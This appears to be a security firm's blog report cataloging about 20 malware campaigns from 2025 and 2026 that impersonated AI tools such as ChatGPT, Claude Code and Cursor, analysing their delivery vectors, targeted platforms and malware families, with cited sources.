Blog
min read
.png)
Between February 2025 and March 2026, at least 20 distinct malware campaigns have targeted AI and vibe coding tools specifically. The targets span the full stack of the AI developer ecosystem: code editors (Cursor, Claude Code), AI agents (OpenClaw), LLM platforms (ChatGPT, DeepSeek, Grok), AI-powered browser extensions, AI video generators (Luma AI, Kling AI), and AI business tools (NovaLeads AI, InVideo AI).
This report catalogs every publicly documented campaign, maps the attack vectors, and identifies which tools have been hit and which are next.
The research builds on our deep-dive analysis of InstallFix: Fake Claude Code Pages Deliver Amatera Stealer via Google Ads which documented one of the most sophisticated campaigns in this dataset: a pixel-perfect Squarespace replica of Anthropic's official documentation, promoted through Google Ads, delivering the Amatera Stealer through an obfuscated multi-stage payload chain. That campaign, cataloged here as #18, exemplifies the attack patterns now proliferating across the ecosystem.
The campaigns cluster into five distinct attack vectors, each exploiting a different trust boundary.
Seven campaigns used paid search ads or search engine poisoning. The technique is straightforward: buy an ad for "install [AI tool]" and serve a convincing clone. The InstallFix campaign targeting Claude Code is the most sophisticated example, using a pixel-perfect Squarespace replica of Anthropic's official documentation.
The OpenClaw campaign introduced a new variant: simply hosting fake repos on GitHub was enough to get them promoted by Bing's AI-generated search results. No ad purchase was needed. As Huntress noted, "just hosting the malware on GitHub was enough to poison Bing AI search results." [17] This is a significant escalation because it means AI-powered search is now an attack surface itself.
Three campaigns exploited user-generated content on the AI platforms' own domains. The ChatGPT shared-chat attack (Kaspersky, December 2025) is particularly clever: attackers create a public ChatGPT conversation containing a fake "Atlas browser" installation guide with a ClickFix terminal command. The link leads to chatgpt.com/share/..., which is OpenAI's legitimate domain. The AdGuard-reported campaign (February 2026) does the same thing with claude.ai artifacts, creating fake Homebrew install guides on Anthropic's own domain and buying Google Ads to promote them.
The trust chain is devastating: Google Ad → official AI platform domain → user-generated malicious content. The victim never leaves a "trusted" site.
Six campaigns targeted browser extension or IDE extension marketplaces. The scale is staggering: the Microsoft-reported campaign alone reached 900,000 installs across 20,000+ enterprise tenants. The AiFrame campaign hit 260,000 users. The VS Code AI extension campaign reached 1.5 million downloads.
Extension marketplaces are the weakest link. Review processes are insufficient, and users have been trained to install extensions casually. The Cursor $500K theft started with a single malicious VS Code extension.
Five campaigns used standalone fake websites distributed through SEO manipulation or social media advertising. The UNC6032 campaign (Mandiant/Google) ran thousands of ads on Facebook and LinkedIn for fake versions of Luma AI, Canva Dream Lab, and Kling AI, reaching 2.3 million users in the EU alone. The DeepSeek campaigns used both Google Ads and standalone phishing sites with fake CAPTCHA pages.
One confirmed campaign targeted the npm registry with malicious packages impersonating Cursor IDE tools for macOS. This vector is particularly dangerous because developers install packages programmatically, often without manual review.
Not all AI tools face equal risk. The following breakdown shows which tools have been hit, how many times, and through what vectors.
ChatGPT is the most targeted AI tool by a wide margin, appearing in five separate campaigns. This makes sense: it has the largest user base and the strongest brand recognition, making it the most effective lure. Cursor IDE is the most targeted AI code editor with three distinct campaigns across three different vectors (ads, extensions, npm), demonstrating that attackers probe every possible entry point.
Of the 20 campaigns, the platform targeting breaks down as follows:
macOS is disproportionately targeted relative to its market share. Seven campaigns target macOS exclusively, and the cross-platform campaigns also include macOS payloads. The reason is clear: AI/vibe coding tool users skew heavily toward macOS, and macOS users tend to have higher-value credentials (SSH keys, cloud tokens, cryptocurrency wallets).
The ClickFix/InstallFix technique (tricking users into pasting commands into Terminal) is uniquely effective against developers because curl | sh is a legitimate installation pattern. Homebrew, Rust, nvm, and many other developer tools use this exact pattern. The malicious commands hide in plain sight.
The campaigns deploy at least 13 distinct malware families, ranging from infostealers to ransomware to destructive malware.
The diversity is notable. Attackers are not deploying cookie-cutter stealers; they are tailoring payloads to the target demographic. Developers get infostealers (credentials, crypto). Business users get ransomware. The Numero malware is purely destructive, suggesting some campaigns are motivated by disruption rather than profit.
Plotting the campaigns by quarter reveals a clear acceleration:
The first 10 weeks of 2026 have already produced more campaigns than all of 2025 combined. The trend is unmistakable: as vibe coding tools go mainstream, the attack surface expands proportionally. Every new tool that gains traction becomes a target within weeks.
The following popular AI coding tools have no publicly documented impersonation or malvertising campaigns. Based on the patterns observed, they are at elevated risk.
The InstallFix technique (cloning official docs and replacing install commands) is trivially adaptable to any tool that uses curl | sh, npm install, or pip install as its primary installation method. Every tool on this list fits that profile.
Three structural factors make this problem worse, not better:
First, AI search is now an attack surface. The OpenClaw campaign proved that simply hosting malicious content on GitHub is enough to get it promoted by Bing's AI search. As more users rely on AI-generated search summaries rather than manually evaluating URLs, the barrier to successful social engineering drops further.
Second, trusted domains are being weaponized. The ChatGPT shared-chat and claude.ai artifact attacks exploit the fact that AI platforms allow user-generated content on their own domains. When a Google Ad leads to chatgpt.com, even security-conscious users may lower their guard. This is a fundamental design tension: the same features that make AI tools useful (sharing, collaboration, public artifacts) create attack surface.
Third, the cloaking infrastructure is mature. Platforms like 1Campaign (exposed by Varonis, February 2026) have been operational for 3+ years, enabling attackers to bypass Google's ad review with a 99.2% block rate against security scanners. [19] This means the ad review process is structurally broken for this class of attack. The attackers have industrialized their evasion.
The net result: any AI tool that gains significant search volume will be impersonated within weeks. The campaigns are cheap to run, the infrastructure is available as a service, and the targets (developers with high-value credentials) are worth the investment.
[1] Zscaler, "DeepSeek Lure Using CAPTCHAs To Spread Malware," February 25, 2025. https://www.zscaler.com/blogs/security-research/deepseek-lure-using-captchas-spread-malware
[2] Cisco Talos, "Cybercriminals camouflaging threats as AI tool installers," May 29, 2025. https://blog.talosintelligence.com/fake-ai-tool-installers/
[3] Malwarebytes, "DeepSeek users targeted with fake sponsored Google ads that deliver malware," March 26, 2025. https://www.malwarebytes.com/blog/news/2025/03/deepseek-users-targeted-with-fake-sponsored-google-ads-that-deliver-malware
[4] Kaspersky/Securelist, "Backdoors and stealers prey on DeepSeek and Grok," March 6, 2025. https://securelist.com/backdoors-and-stealers-prey-on-deepseek-and-grok/115801/
[5] Guardio Labs, "VibeScamming - From Prompt to Phish," April 9, 2025. https://medium.com/@guardiosecurity/vibescamming-from-prompt-to-phish
[6] The Hacker News, "Malicious npm Packages Infect 3200+ Cursor Users With Backdoor," May 9, 2025. https://thehackernews.com/2025/05/malicious-npm-packages-infect-3200.html
[7] Mandiant/Google, "Text-to-Malware: How Cybercriminals Weaponize Fake AI-Themed Websites," May 27, 2025. https://cloud.google.com/blog/topics/threat-intelligence/cybercriminals-weaponize-fake-ai-websites/
[8] BleepingComputer, "Malicious VSCode extension in Cursor IDE led to $500K crypto theft," July 14, 2025. https://www.bleepingcomputer.com/news/security/malicious-vscode-extension-in-cursor-ide-led-to-500k-crypto-theft/
[9] ImpersonAlly, "As AI Booms, Fraudsters Follow: The Case of Cursor," September 7, 2025. https://impersonally.io/as-ai-booms-fraudsters-follow-the-case-of-cursor/
[10] Kaspersky, "The AMOS infostealer is piggybacking ChatGPT's chat-sharing feature," December 9, 2025. https://www.kaspersky.com/blog/share-chatgpt-chat-clickfix-macos-amos-infostealer/54928/
[11] PhoneArena/Mosyle, "Mac users are being targeted by a fake Grok app," January 12, 2026. https://www.phonearena.com/news/mac-users-are-being-targeted-by-a-fake-grok-app-and-its-powered-by-ai_id177227
[12] The Hacker News, "Malicious VS Code AI Extensions with 1.5 Million Installs Steal Data," January 26, 2026. https://thehackernews.com/2026/01/malicious-vs-code-ai-extensions-with-15.html
[13] AdGuard, "Claude-linked Google ads dupe macOS users into installing malware," February 12, 2026. https://adguard.com/en/blog/claude-google-ads-malware-poisoning-macos.html
[14] LayerX, "AiFrame - Fake AI Assistant Extensions Targeting 260,000 Chrome Users," February 12, 2026. https://layerxsecurity.com/blog/aiframe-fake-ai-assistant-extensions-targeting-260000-chrome-users-via-injected-iframes/
[15] PCWorld, "30 fake AI Chrome extensions caught stealing passwords and more," February 17, 2026. https://www.pcworld.com/article/3063476/30-fake-ai-chrome-extensions-caught-stealing-passwords-and-more.html
[16] Pillar Research, "InstallFix: Fake Claude Code Pages Deliver Amatera Stealer via Google Ads," March 9, 2026. https://pillar.security/pillar-research/installfix
[17] BleepingComputer/Huntress, "Bing AI promoted fake OpenClaw GitHub repo pushing info-stealing malware," March 5, 2026. https://www.bleepingcomputer.com/news/security/bing-ai-promoted-fake-openclaw-github-repo-pushing-info-stealing-malware/
[18] Microsoft, "Malicious AI Assistant Extensions Harvest LLM Chat Histories," March 5, 2026. https://www.microsoft.com/en-us/security/blog/2026/03/05/malicious-ai-assistant-extensions-harvest-llm-chat-histories/
[19] Varonis, "1Campaign: A New Cloaking Platform Helping Attackers Abuse Google Ads," February 24, 2026. https://www.varonis.com/blog/1campaign
Subscribe and get the latest security updates
Back to blog